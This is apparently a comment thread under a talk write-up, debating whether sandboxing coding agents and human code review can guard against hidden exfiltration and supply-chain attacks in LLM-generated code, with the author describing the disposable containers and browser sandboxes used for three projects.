Sandboxing the agent hardly seems like a sufficient defense here.
Sandboxing the agent hardly seems like a sufficient defense here.
All three of the projects I described in this talk have effectively zero risk in terms of containing harmful unreviewed code.
DeepSeek-OCR on the Spark? I ran that one in a Docker container, saved some notes on the process and then literally threw away the container once it had finished.
The Pyodide in Node.js one I did actually review, because its code I execute on a machine that isn't disposable. The initial research ran in a disposable remote container though (Claude Code for web).
The Perl in WebAssembly one? That runs in a browser sandbox. There's effectively nothing bad that can happen there, that's why I like WebAssembly so much.
I am a whole lot more cautious in reviewing code that has real stakes attached to it.
Obviously your recommendation to sandbox network access is one of several you make (the most effective one being “don’t let the agent ever touch sensitive data”), so I’m not saying the combined set of protections won’t work well. I’m also not saying that your projects specifically have any risk, just that they illustrate how much code you can end up with very quickly — making human review a fool’s errand.
ETA: if you do think human review can prevent secret exfiltration, I’d love to turn that into some kind of competition. Think of it as the obfuscated C contest with a scarier twist.
In the library case, there is a network of people that could (and sometimes do) deliberately inject attacks into the supply chain. On the other hand, those libraries are used and looked at by other people - odds of detection are higher.
With LLM generated code, the initial developer is the only one looking at it. Getting an attack through in the first place seems harder, but detection probability is lower.